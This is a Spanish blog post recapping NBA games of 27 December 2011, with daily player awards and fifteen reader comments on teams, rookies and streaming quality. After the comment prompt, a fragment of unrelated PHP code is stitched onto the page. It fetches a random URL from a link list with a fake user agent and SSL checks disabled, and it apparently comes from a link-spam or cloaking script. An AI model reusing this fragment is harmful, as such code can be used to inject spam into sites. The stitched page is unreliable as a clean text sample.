La Crónica (27/12/2011)

28 de December de 2011 por TheDeerHunter

Tercera jornada y algo menos de intensidad que las dos anteriores.

El plato principal era la visita de los Celtics a Miami y no defraudó. Calendario en su recta inicial demasiado exigente para unos verdes sin Pierce y 2 derrotas. Puede notarse la diferencia entre Pavlovic y él. Rondo rozó el triple doble y Allen recordó al de las mejores tardes pero Garnett estuvo demasiado discreto. Con su Big Three a buen ritmo los locales dominaron sobradamente desde el principio pero ya conocemos el orgullo verde y no hubo forma de rematar el partido. Gracias a la aportación de Dooling, Bass y Daniels se pasó de una desventaja de 20 puntos a amenazar seriamente el resultado. Únicamente la irrupción en el último cuarto del rookie Norris Cole, con 14 puntos de sus 20 en total, evitó la remontada. Buena pinta tiene el chaval y si yo fuera Chalmers estaría seriamente preocupado (107-115).

Por orden noticioso el siguiente punto de interés era el Staples. Los Lakers se jugaban un 0-3 ante Utah pero los mormones no fueron rival (71-96). El único que plantó cara fue Millsap y los amarillos mostraron buena cara general. Kobe y Pau, ambos renqueantes, fueron los mejores. Buen debut de Kanter.

Ricky y los Wolves salieron con su 2ª derrota de Milwaukee en otro buen partido (95-98). Ricky estuvo más discreto, con Ridnour reivindicándose ante su ex-equipo y ante un Jennings muy incisivo. El 31-20 de Love no fue suficiente y los Wolves tiraron el choque a base de pérdidas. 3 de ellas fueron de Ricky, por cierto, aunque en este aspecto no se llegó a salvar nadie.

Por último dos palizones de Atlanta y Portland a Nets (106-70) y Kings (79-101) respectivamente. Por Atlanta se produjo el hecho insólito y sin precedentes de que Radmanovic y Marvin Williams cuajaran una gran actuación simultánea. ¿Será un indicador del fin de los tiempos? Los Nets dieron vergüenza ajena en todos los aspectos. Los Blazers por su parte no tuvieron consideración al debut de Chuck Hayes e hicieron sangre del mal partido de Tyreke. Los mejores el dúo LaMarcus Aldridge – Gerald Wallade.

PREMIOS

MVP: Día de parejas. Por un lado la de los Lakers y por el otro la de Miami. Kobe y Gasol consiguieron 48 puntos, 17 rebotes, 5 asistencas y 5 tapones y Lebron y Wade, 50 puntos, 7 rebotes, 13 asistencias y 4 tapones. Pero objetivamente, el mejor partido indvidual del día fue el de Gerald Wallace, 25 puntos (8 de 11), 8 rebotes, 5 asistencias y 2 tapones.

Rookie: Atención que aparece un nombre en escena. Norris Cole, procedente de la Universidad Estatal de Cleveland, ajustició a los Celtics con 20 puntos, 4 rebotes, 4 asistencias y 3 robos. 14 de sus 20 puntos los consiguió en el último cuarto cuando sobre la pista estaban Lebron, Wade y Bosh. Eso es carácter. Y en New Jersey, Marshon Brooks, al que algunos comparaban con Kobe Bryant, se fue a los 17 puntos, convirtiéndose en el máximo anotador de su equipo. Jon Leuer, de Milwaukee, fue otro de los destacados con 14 puntos y 8 rebotes. Enes Kanter capturó 11 rebotes.

Sorpresa: Atlanta se paseó ante los Nets y el mejor fue… Vladimir Radmanovic. 17 puntos, 3 rebotes, 5 asistencias y 4 robos. En su vida había hecho algo así.

Decepción: Anoche Tyreke Evans consiguió más pérdidas (5) que puntos (4). Tengo ya ganas de que vuelva el RoY de la 2009/2010. Remarcable también el 2 de 16 de Al Jefferson, totalmente desquiciado por la defensa de los Lakers.

Esfuerzo en vano: Kevin Love se cascó el primero 30-20 de año pero no fue suficiente para vencer a los Bucks. Necesita más ayuda de sus compañeros. Démosles tiempo. Por su parte, Rajon Rondo se quedó a un par de rebotes del triple doble (22-12-8). Lástima que perdiera hasta 7 balones.

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. melo15 dice:
    #1

    Mal partido de Evans que me esta decepcionando, alguien sabe si tiene alguna lesion o algo?
    Decidme cual es el partido mas divertido y asi me lo veo.

      Citar

  2. melo15 dice:
    #2

    Bien por kanter, alomejor gano el partido en la liga hoops,jjejejejejejejje
    Decidme que hinrich tambien se salio y izo un triple doble

      Citar

  3. nach dice:
    #3

    Al final Kanter tiene el juego de Gasol y el tiro de Nowitzki? xD

      Citar

  4. LEmontus dice:
    #4

    Otro buen partido de Jennings liderando a Bucks en un partido en el que se termina de demostrar que Bogut no está en ataque desde la lesion con Amare y lo bueno que puede llegar a ser Jonh Leuer. Ricky estubo muy muy discreto con miedo al tiro con pérdidas en momentos importantes y con faltas sobre Jennings pero sus 2 o 3 buenas asistencias.

      Citar

  5. GreenPride dice:
    #5

    Pues de ayer vi el Heat-Celtics. De nuevo con un primer tiempo de defensa floja los Celtics parecían abocados a recibir una paliza a manos de un Big Three que los estaba machacando en ataque. Sin embargo, los verdes siempre están ahí y un cambio defensivo de Rivers a zona hizo que los Heat se atascaran de manera preocupante. Al igual que ante los Mavs en las finales Wade, LeBron y Bosh fueron incapaces de leer la defensa zonal y poco a poco los Celtics bajaron la distancia de más de 20 puntos a 3 y posesión verde a minuto y poco del final. Ahí una pérdida de Rondo hizo que se quedaran cortos. Gran partido del rookie Norris Cole que anotó todas las canastas decisivas de los Heat que también se vieron benefciados de una clarísima personal que fue pitada como falta de ataque cuando estaban ya sólo tres arriba. Por los Heat hasta la zona gran partido del Big Three pareciendo muy superiores, desde la zona fracaso total atacándola lo que es preocupante para ellos ya que creo que muchos equipos se refugiarán en ella para paliar la ventaja física (¡Ahi si en la NBA hubiera más equipos capaces de defender bien en zona!!)
    En los Celtics, que por supuesto notan mucho la falta de Pierce y más si juegan los 2 primeros partidos contra los Knicks de Melo y los Heat de LeBron de nuevo muy buen partido de Rondo y Daniels y gran partido de Dooling. Los verdes tras un inicio difícil necesitan recuperar a Pierce y meter a Pietrus en la rotación y a ver como va yendo el año. También vendría bien un Garnett más incisivo en ataque aunque no sé si está ya para esos trotes.

      Citar

  6. Ru dice:
    #6

    Tostonazo el Utah – Lakers,merced a la nueva versión amarilla de Mike Brown que al menos puede estar satisfecho de que en el apartado defensivo ya se notan sus fundamentos.Gasol reinvindicándose y MWP “parece que está”,vamos a ver si no es ningún espejismo.Aún así no considero este partido como una demostración de los Lakers porque los Jazz han hecho gala de una bisoñez que en ningún momento les han hecho competir en este partido.El 2-16 de Al Jefferson,jugador franquicia,es un pecado.No contaría con ellos para PO,están muy verdes -pero hay mimbres de sobra-.

    – Stackhouse,Radmanovic y McGrady,¿en qué año estamos?¿ha sido todo un sueño?xDD
    – Vamos a ver en qué desembocan los Nets de no conseguir a Howard,yo no les veo material para ficharlo mediante traspaso y si DH12 no se va a Brooklyn quien se da el piro es Deron,que por cierto,1 asistencia para él,buf.
    – Nota mental:nunca dar por muertos a los Celtics.

    PREGUNTA

    ¿En qué calidad veis los partidos del NBA League Pass?Porque en mi caso veo los partidos regular,bastante pixelados,que a la hora de seguir la bola o fijarme en las estadísticas es complicadísimo de saber qué pone.Si voy a pagar por toda la temporada quiero verlo aún mejor,no estoy pidiendo una experiencia FULL HD,pero va.Entonces no sé si es mi conexión de 15 MB u os pasa a todos los mismo.Comentadme please 😉

      Citar

  7. Pirata dice:
    #7

    Eramos pocos y parió la abuela……..

      Citar

  8. GreenPride dice:
    #8

    Ru en cuanto a los partidos por League Pass yo los veo de cine con una conexión de 30MB así que debe ser algo de tu conexión.
    Aprovecho para comentar sobre los Nets. Yo no entiendo cómo mucha gente los da como equipo de playoffs. Quizá porque crean que Howard acabará allí porque si no, no me lo explico. Para mí, tal como está la plantilla hoy día son un clarísimo equipo de lotería y creo que les caerán muchas más palizas como las de esta noche.

      Citar

  9. TheDeerHunter dice:
    #9

    A mí lo que me hace especial gracia es que Deron la lió con Sloan, pero ahora es dirigido por Avery Johnson. ¿No quería sopa??

      Citar

  10. busky23 dice:
    #10

    Parece que el robo del draft ha caído este año en Miami…veremos a ver que progresión muestra este Norris Cole,descaro no le falta,asumiendo responsabilidades en el ultimo cuarto, contra los Celtics,y con los mismísimos Lebron & Wade en su equipo,chapó por el chaval.
    Los 2 gorros de Wade,brutales.
    Ricky esta vez no lució tanto,pero se ha visto de nuevo al Kevin Love de la temporada pasada,tremendo partido el suyo.
    Por fin! victoria balsámica para Lakers,aunque Utah colaboro y mucho a su derrota,29/90 en tiros de 2 y 1/13 en triples…para echarse a llorar…

    PD: Tenéis que ver este video,un lujo,de los mejores anuncios que visto nunca de NBA
    http://m.youtube.com/index?desktop_uri=%2F&gl=ES#/watch?v=exZuVO3PEbM

      Citar

  11. rumbero dice:
    #11

    Tremendo lo de Cole, menudo último cuarto. Si este año le dan a él los balones decisivos y no a Lebron igual hasta se llevan el anillo xD Vi el partido y coincido con GreenPride. A la que los verdes cambiaron en defensa pusieron en apuros a Miami, pero les faltó Pierce y juego interior. Que J. O’Neal juegue 22 minutos y no sea capaz de meter un solo punto y pillar solo un rebote tiene tela
    Si los Nets esperan llevarse a DH12 lo llevan claro si dan exhibiciones como la de ayer con Sundiata Ganes de crack

      Citar

  12. portu dice:
    #12

    Me pasa igual q a ti Ru con lo del league pass, tb con una conexión de 15Mb, pero luego abrí mi cuenta en un MacBook de unos amigos con otra conexión igual y funcionaba de lujo, así q parece q el portátil tb influye… yo tb tenía claro q lo pagaría esta temporada y ahora no lo tengo tan claro…

      Citar

  13. Uno cualquiera dice:
    #13

    Busky23, has puesto mal el link pero supongo que el vídeo que querías poner es éste:

    http://www.youtube.com/watch?feature=player_embedded&v=O-TXe6cWidA

    Lo puse en los comentarios de la crónica del día 25, pero pasó desapercibido 🙁

      Citar

  14. Sancho88 dice:
    #14

    Deer, me parece que Chuck ya debutó contra L.A. el lunes. La verdad, que ayer los kings se hundiero contra un equipo muy superior, como demostraron ser los Blazers. Para mí, son los sextos favoritos por el oeste, y el cambio de Andre Miller por Felton no desmerece para nada. Más intensidad defensiva por parte de Felton y mejor lectura del juego, aunque técnicamente y estéticamente Miller es bastante mejor. Crawford no tiene los galones que tenía en atlanta, ya que Batum es un jugador soberbio y no le va a dejar nunca comerle la tostada. Se repartirán 20-25 minutos cada uno todos los días. Pero sin duda, un jugador que enamora es Lamarcus Aldridge. Es el único jugador de la liga que tiene los mimbres para llegar a ser parecido a Tim Duncan. Maravillosa lección de juego desde el poste alto al poste bajo, domina todos los movimientos en la zona y tiene una técnica exquisita. A mi me deja atontonado viéndole jugar. Sobre los kings, Demarcus Cousins cada día me gusta más, y tiene una cosa que no tienen muchos jugadores pívots. Muchos se dedican a postear, hacer un reverso a lo maricón para irse más lejos, no para ganar centímetros a la canasta, y tirar desde media distancia. Cousins no hace eso, el tío se faja para buscar el aro lo más cerca posible, y su superiodidad física se lo permite. Es maravilloso ver que todavía quedan pívots con dos pelotas que no les importa quién esté delante defendiéndoles.

    Tyreke… en su línea irregular desde el año pasado. Combina buenos partidos con otros donde no aparece, y el equipo lo paga. Aunque he de decir que tampoco estuvieron nada acertado ayer Salmons, Thornton y Freddette. Voy a decir algo positivo de Tyreke y Rubio. Son dos bases que tienen grandes movimientos, son diferentes pero saben de qué va el juego. El problema es que a veces tienen secundarios de risa, sobre todo en Minnesotta, y asistencia que hubieran sido canastas en otros equipos, en sacramento o minesota acaban en pérdidas de balón, tiros que van a cualquer sitio o tíos chupones peleando contra todo el equipo rival intentando entrar en los highlights de la jornada… Lo digo por Barea, Beasley, Williams, etc. Que parece que la culpa de todo la tiene ricky, pero ya me diréis que hacen esos tres pollos sin cabeza… descerebrados al máximo con el balón.

    Por hoy no tengo nada más que decir. A sí, que os he robado a Cole en la hoops, jeje. Fue con nocturnidad y alebosía… xd

      Citar

  15. Sancho88 dice:
    #15

    Uno cualquiera:
    Busky23, has puesto mal el link pero supongo que el vídeo que querías poner es éste:

    http://www.youtube.com/watch?feature=player_embedded&v=O-TXe6cWidA

    Lo puse en los comentarios de la crónica del día 25, pero pasó desapercibido

    Sí, así abrieron la temporada con el Celtics-Knicks. Yo no puse nada porque ya lo había comentado por el facebook ese día, pero la verdad es que es un vídeo sorprendente. Saben venderte la burra a la perfección. Yo creo que se han inspirado un poco en el 2K, ahora con los equipos históricos y demás, y han decidido hacer este pedazo de montaje. Ojiplático me quedé viéndolo, tb con el pedazo de plató de la TNT, y con el discurso más comedido de Shaquille como comentarista. Yo me lo esperaba más socarrón. De todas, ahí está gordo para suplirle, xd.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>